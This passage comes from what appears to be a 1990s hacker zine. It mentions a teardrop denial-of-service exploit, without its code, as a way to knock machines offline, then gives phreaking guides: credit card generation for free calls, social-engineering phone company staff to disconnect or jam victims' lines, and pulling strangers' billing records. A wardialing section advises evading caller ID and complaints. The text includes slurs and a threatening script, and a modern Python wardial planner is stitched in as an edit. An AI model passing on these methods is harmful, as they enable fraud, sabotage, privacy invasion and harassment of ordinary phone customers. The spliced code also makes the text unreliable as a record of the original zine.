source IP of the packet.

Exploit code has been included in a separate file for space purposes. External
file is 'teardrop.c'.

The patch for this exploit can be found on www.microsoft.com for Windows
machines, and ftp.kernel.org for Linux machines (pre-patch.2.0.32.gz), and
this problem is fixed in Linux 2.0.32 kernels. Anyway, most machines as of the
date that I wrote this are NOT patched, and this can be extremely useful for
taking someone offline, causing remote machine reboots (GTE Cybercenters (:
heheh) and other fun stuff.

-= CAU =-

##############################################################################

Phreaking

%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%

Phone Stocking Stuffers

Well, it's been a while since I wrote an article, due to some Legal Problems
with an unnamed Internet Provider. I think it's time I start to write stuff
again. Now, for those who read this and think that I'm the guy doing this
*COUGH* Police, FBI, etc. *COUGH* I'm just a third party ;) Yea.

Anyways, I'm trying to think about something to write about... Hummm,.. Okay...

Okay, first off: for those guys who say, "CAU give me a Clue, Teach me to Hack
Computers", if you wanna hack you have to have a Hat, I mean a Big O' Dr.
Seuss, Horton Hears a Who type hat. Once you have the Hat, you're ready to
hack. I'm sick of the word Hack. Okay, from now on it's pimpin'. So, anyways,
back to what I was saying. You got a hat, you're ready to pimp. Speakin' of
Smackin' Bitches up, Ahhhh Nevermind...
maybe later... heh

Humm, anyways... Enough of the B.S.

----Pimpin' the Phone Company in General----

HAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHA-

Okay, if you don't know shit about shit, but you wanna do some funny stuff,
the phone company is the place to start. Through the Frame, you can change the
Line Class on a residential phone to a Class "C", meaning every time someone
wants to make a call it says "Please Deposit 25 cents." Anyone can do it,
trust me. Just play dumb and act like you're a new line technician. It's like
your 3rd day on the job, and you're having trouble with everything that has
to do with telephones. They'll usually help you out, and tell you what
everything means. If at any point you feel uncomfortable, just say, "Humm, I
guess I'll go ahead and try to get a hold of my Supervisor." Don't EVER say
shyt like, "WELL, FUQ YOU * CLICK" because they will call the BOSS who calls
their BOSS who faxes a Warning to All the Switches. Basically, Don't Say
Stupid Shit. I HATE FAGGOTS WHO PRANK CALL SWITCHES/FRAMES. THEY FUCK IT UP FOR
EVERYONE!

----DA' PAYPHONE BLUES----

FUQN Southwestern Bell UPPED THE PRICE OF PAYPHONES TO $.35. That's some DAMN
shit. Time to break out the ol' redbox. Redboxes are funny yet annoying; for
those who use codes or for those who just can't seem to find a place where the
crystal fits, break out your Credit Card Generator and extrapolate from a REAL
card. If you can't find a real card just generate card numbers and go down the
list until you find one that works. This, I imagine, will be VERY time
consuming, but when you find that one that works then you can extrapolate off
that one. Anyways, let's pretend you have a REAL card number now. You would
want to call (800)CALL-ATT. That's right, "Thank you, AT&T!". DO NOT call them
direct if you're calling from your house; at least OP Divert: call "0" and
have them dial 800-CALL-ATT.
When you Op Divert to AT&T, an AT&T operator should come on and say, "May I have the number you're calling from, please?" Give them a BS number; it's best to use your real area code, the rest can be anything. Then give them the number you wanna call, and a C.Card number. BAMMM. Free calls, about 80% worldwide. That's right, even International calls!@@ who0p?!@#$ hehe. There you go. Enjoy. AT&T only accepts MASTERCARD and AMERICAN EXPRESS now.

---FIND WHAT LONG DISTANCE NUMBERS SOMEONE IS CALLING----

Humm... Some basic shit... Look at the number on your phone bill to call for Billing Questions ((800)585.7928 here) and you can look up other people's phone bills. See how much they owe, past/present amount due... Just type in their phone number when it prompts you. You can also talk to a repair person there, and have them look up every long distance number on a bill. They'll be more than happy to tell you anything. Sometimes they'll even tell you the last four digits on the bill (the last four digits of the phone owner's Social Security Number), and with that you can add/take off features like Call Waiting, Call Forwarding, REMOTE call forwarding (hehe), long distance call block, etc... Put a password on their line so whatever you add they can't take off.

---PULLING HEAT COILS---

Pulling heat coils is fun. Basically, when you pull a heat coil, you're taking the voltage outta someone's phone. It's some funny shit, and a lot of the time it has the Line Technicians running around for a couple of days... Here's what you wanna do: Call up your local FRAME, not your SWITCH; there is a difference, for some reason people think the SWITCHES are the same thing as FRAMES. Okay, anyways, call up to the FRAME and tell them -- Nevermind, here's what the conversation should look like:

-YOU: HowDy, How are you doin' Today? (* HICK ACCENT *)
-THEM: Oh' I'm doing okay, who's this?
-YOU: Well, Alrighty, this is Johnny Bahergalbo over here at *whatever Frame you can think of other than the one you're calling*.
I'm needin' to pull a heat coil on a line. I don't have the cable and pair and I was wondering if you could look that up for me, please.
-THEM: Humm, Okay, what's the number?
-YOU: It's (???)xxx-xxxx *Phone Number*
-THEM: Okay, be right back.
-YOU: HAHAHAHAHAHAHAHA, FUCK YOU. *cough* I mean, well, alrighty...
-THEM: Okay, it's done. How long do you wanna keep it out?
-YOU: I'll be working on it for a while, so I'll call back when I'm done. Thank you, ma'am. Are you into ButtFuckin'?
-THEM: No, why.
-YOU: BETTER WATCH YO BACK BITCH! *CLICK*

---BUSY SHOES---

Okay, there are a lot of different types of shoes. (No pun intended) One of them is called a Busy Shoe. A Busy Shoe does what it sounds like it does: it makes a person's phone line busy forever, but the person can still use it for outgoing calls whenever. Call up to your local Frame and just simply tell them that you need to put a busy on a line. Give them the number and BAMM, you're done. Sometimes they don't wanna do it and they'll tell you you need to call Surveillance... No, before any of you get excited, Surveillance is NOT what its name says... From what I understand, they do tests on the big-ass switches, like ?ESS..

---HAVING TROUBLES GETTING INTERNAL PHONE COMPANY NUMBERS?---

The best thing to do when you can't seem to find a starting point or a number to start with would be to go dig through the trash at your local Phone Company building. You WILL find some numbers to start out with. Just work your way up.

Fun numbers to have:
CNA - Look up people's Address/Names by typing in a phone number.
NOC - Network Operations Center
NAC - Basically the same thing as a NOC, but a lot of times it's automated.
FRAME - COILS, CABLE/PAIRS, TESTS, hehe
SWITCH - Talk to some Hillbillys that are usually in a drunken stupor.
REPAIR - Can also look up Cable/Pairs. This is actually a better starting point. You can get a LOT of shit from your local publicly available Repair Center.

There's a LOT of other numbers, I mean a SHIT load.
My only advice is when you Social Engineer, don't do it from your house unless you divert through something (e.g. AT&T).

Questions? Comments? Somethin'? E-Mail Me == int3l@caughq.org

int3l

%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%

I)ruid's Novice Corner: Wardialing Tips and Technique (for the beginner)

Alright, another one of my 'for the novice' articles, considering that Fizban has apparently given up on his Newbie Corner column. This article will basically give you a few tips and techniques for basic wardialing.

First of all, if you don't know what Wardialing is, it's basically dialing every phone number in an NPA (Numbering Plan Area, i.e. area code) and prefix (the first three digits of a seven-digit phone number), usually in random order, until you've dialed all of them, taking note of which ones give you carriers, tones, etc.

The CAU used to provide a local scan or two each month, but as we've all become more interested in network and Internet hacking, we've done less and less on the local front, and no one seems to want to contribute scans anymore anyway, let alone actually scan them. Eventually I plan to have a machine and phone line dedicated to providing local scans for the zine; however, scans of other NPA's and prefixes would be greatly appreciated if they were sent in. Anyway, on to the list:

1) DOWNLOAD A DECENT WARDIALER - Using a cheesy wardialer will only slow down your scan and may inhibit the quality of your scan. I would personally suggest ToneLoc, but others also seem to like THC-Scan. There are a variety of wardialers available on the net, so go look for them. There is also a collection of them on the CAU ftp site.

2) ALWAYS USE *67 - (or the Caller ID block prefix for your area) What this does is block your caller ID information from being sent to the numbers you are calling. Note that it only blocks the Caller ID display at the called party's end; the phone company's own records (ANI and billing) still show exactly which numbers your line dialed.
Most people don't like it too much when they wake up in the morning and see that some random person called them at 3:42 am and woke them up, only to have it screech in their ear when they pick up, and will promptly call you back and yell at you.

3) CALL FORWARDING IS A PLUS - If your line is equipped with call forwarding, forward your line before you start scanning. This will eliminate scan interruptions from people calling you back with their wondrous *69 (call return). This will also discourage people that had planned to call you back and yell at you, especially when you forward your number to a disconnected number, thus giving them an error message, or forwarding it to the local mental hospital. If your line is not equipped with call forwarding, I would seriously suggest getting your phone company to hook you up with it. It is quite useful.

4) USE TIME-WINDOWS - Set up your scan to scan during certain time windows. Normally you would want to scan business prefixes at night, when no one is at work, and residential during the day, when no one is at home. Call where the people are NOT. I know, I know, most people say "Don't scan residential!" but why not? You may not find as many tones or carriers as in business prefixes, but what you DO find is usually very interesting or strange.

Well, that's about it. There's really not much to wardialing; just make sure that you don't re-call the same numbers more than once. Normally, if someone yells at the phone company about harassment, you can point out that you only dialed that number once, and that you just dialed it wrong, therefore it's not harassment. If they then point out that you dialed EVERY number in that prefix once, tell them that you forgot the number but you knew it was in that prefix, and just dialed them all until you got it. And it just happened to be the last number you tried. Doesn't that always seem to happen? It's the last place you look?
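The four tips above (a decent dialer, Caller ID block on every call, time windows, never re-dialing a number) are really one procedure, so here it is as an added example: a scan planner, written for this edit and not part of the zine or of ToneLoc/THC-Scan. It only produces the dial strings and keeps the bookkeeping; feeding them to a modem is the wardialer's job. The NPA/prefix 817/555, the window hours, the "*67" prefix and the assumption that the modem dials a plain ten-digit number with no leading "1" are all constructed for the example.

```python
# Scan planner for a wardialing run (added example, not from the zine).
# Applies: caller-ID block prefix on every number, business-vs-residential
# time windows, random dial order, and a dialed-set so that no number is
# ever called twice. Only generates dial strings; it does not dial.
import random

CID_BLOCK = "*67"             # assumption: NANP caller-ID block prefix
BUSINESS_WINDOW = (22, 6)     # 22:00-06:00: scan business prefixes at night
RESIDENTIAL_WINDOW = (9, 17)  # 09:00-17:00: scan residential during the day
LINES_PER_PREFIX = 10_000     # NPA-NXX-0000 .. NPA-NXX-9999


def in_window(hour, window):
    """True if `hour` (0-23) lies in [start, end); the window may wrap midnight."""
    start, end = window
    if start <= end:
        return start <= hour < end
    return hour >= start or hour < end


class ScanPlan:
    def __init__(self, npa, prefix, business, seed=0):
        if not (npa.isdigit() and len(npa) == 3 and prefix.isdigit() and len(prefix) == 3):
            raise ValueError("NPA and prefix must be three digits each")
        self.npa, self.prefix, self.business = npa, prefix, business
        # Randomised order so the block is not walked sequentially.
        self._order = list(range(LINES_PER_PREFIX))
        random.Random(seed).shuffle(self._order)
        self._pos = 0
        self._dialed = set()
        self.results = {}  # line -> "carrier" | "tone" | "voice" | "busy" | "nothing"

    def window(self):
        return BUSINESS_WINDOW if self.business else RESIDENTIAL_WINDOW

    def dial_string(self, line):
        """CID block + 10-digit number (assumption: no leading '1' needed)."""
        return f"{CID_BLOCK}{self.npa}{self.prefix}{line:04d}"

    def next_number(self, hour):
        """Next undialed number if inside the time window, else None.
        Also returns None once every line in the block has been dialed."""
        if not in_window(hour, self.window()):
            return None
        while self._pos < len(self._order):
            line = self._order[self._pos]
            self._pos += 1
            if line in self._dialed:  # never re-call a number
                continue
            self._dialed.add(line)
            return self.dial_string(line)
        return None

    def record(self, dial_string, result):
        """Log what answered; refuses results for numbers that were never dialed."""
        line = int(dial_string[-4:])
        if line not in self._dialed:
            raise ValueError("result for a number that was never dialed")
        self.results[line] = result

    def remaining(self):
        return LINES_PER_PREFIX - len(self._dialed)

    def findings(self):
        """(number, result) pairs for lines that answered with a carrier or tone."""
        return sorted(
            (f"{self.npa}-{self.prefix}-{line:04d}", r)
            for line, r in self.results.items()
            if r in ("carrier", "tone")
        )


if __name__ == "__main__":
    plan = ScanPlan("817", "555", business=True, seed=1)
    print(plan.next_number(hour=14))  # None: business block, daytime
    first = plan.next_number(hour=23)
    plan.record(first, "carrier")
    print(first, plan.remaining(), plan.findings())
```

A real run would loop on `next_number()` with the current clock hour, stop when it returns None, and call `record()` with whatever the modem reported, so the carrier/tone list at the end is the scan log the article asks you to keep.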
(: Anyway, as long as you play it cool, the phone company can't really do anything until it turns into harassment; after all, you're paying them for the access to call any number you want to. Who is to say that you can't dial any number you want?

I)ruid

##############################################################################

Closing

Well, this has been the best Zine yet in my opinion, and I was even able to stick to the Christmas theme as well. I'm already in the process of putting together next month's Zine, and it's starting to look pretty good too.

In case you haven't done this already, visit the CAUGHQ website (at www.caughq.org) and join the CAU mailing list from the main page. This way you will be informed of new files, new Zines, and updates on general CAU stuff. I usually release stuff to the CAU mailing list a few days before I release to the general public, so if you want to get a jump on CAU stuff, join the list.

Also, just a reminder, send all article submissions, letters to the editor, and general zine stuff to articles, letters, and zine @caughq.org (respectively).

I)ruid

##############################################################################

____ ____ __ __ / \ / \ | | | | ----====####/ /\__\##/ /\ \##| |##| |####====---- | | | |__| | | | | | | | ___ | __ | | | | | ------======######\ \/ /#| |##| |#| |##| |######======------ \____/ |__| |__| \______/ Computer Academic Underground